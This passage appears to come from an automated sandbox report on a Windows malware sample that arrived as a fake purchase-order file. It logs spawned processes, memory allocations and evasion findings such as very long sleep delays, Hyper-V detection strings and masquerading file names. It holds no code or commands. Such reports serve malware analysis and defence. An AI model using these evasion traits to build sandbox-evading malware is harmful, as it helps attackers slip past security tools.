                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02DEA954
                          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E10000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E11000 memory commit 500178944
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E3C000 memory commit 500002816
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E3D000 memory commit 500199424
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E6E000 memory commit 501014528
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2F66000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2F68000 memory commit 500015104
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E20000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E21000 memory commit 500178944
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E4C000 memory commit 500002816
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E4D000 memory commit 500199424
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2E7E000 memory commit 501014528
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2F76000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: 2F78000 memory commit 500015104
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2DD0000 memory commit 500006912
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2DD1000 memory commit 500178944
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2DFC000 memory commit 500002816
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2DFD000 memory commit 500199424
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2E2E000 memory commit 501014528
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2F26000 memory commit 500006912
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: 2F28000 memory commit 500015104
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 29530000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 29740000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 29560000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Memory allocated: 2AC0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Memory allocated: 2D00000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Memory allocated: 2C30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Memory allocated: 6390000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Memory allocated: 2E390000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Memory allocated: EA0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Memory allocated: 2C60000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Memory allocated: 4C60000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 2D4B0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 2DA90000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 2D660000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 30600000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 30990000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: 32990000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Memory allocated: 15B0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Memory allocated: 2FF0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Memory allocated: 1620000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004019F0 OleInitialize, GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, CloseHandle, Module32Next, task_proc, Module32Next, CloseHandle, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, SizeofResource, FreeResource, SizeofResource, LoadLibraryA, GetProcAddress, #8, #8, #8, #15, #23, #24, #16, #411, #9, #9, #9
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9899
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Window / User API: threadDelayed 1920
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Window / User API: threadDelayed 788
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Window / User API: threadDelayed 7272
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Evasive API call chain: GetModuleFileName, DecisionNodes, Sleep (graph_4-11938)
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 4180 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 5400 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1420 | Thread sleep count: 9899 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 4128 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 532 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 2832 | Thread sleep time: -115200000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 2832 | Thread sleep time: -436320000s >= -30000s
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Last function: Thread delayed
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD58B4 GetModuleHandleA, GetProcAddress, lstrcpynA, lstrcpynA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA, lstrcpynA, lstrlenA, lstrcpynA
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Thread delayed: delay time: 60000
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Thread delayed: delay time: 60000
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.0000000000943000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@9
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Microsofts.exe, 00000006.00000002.24170624386.0000000000F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSyst
                          Source: Oupzhkpr.PIF, 00000010.00000002.23142368522.0000000000789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Oupzhkpr.PIF, 0000000C.00000002.23062263204.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                          Source: C:\Users\user\Desktop\PO_B2W984.comAPI call chain: ExitProcess graph end nodegraph_0-25355
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end nodegraph_12-24472
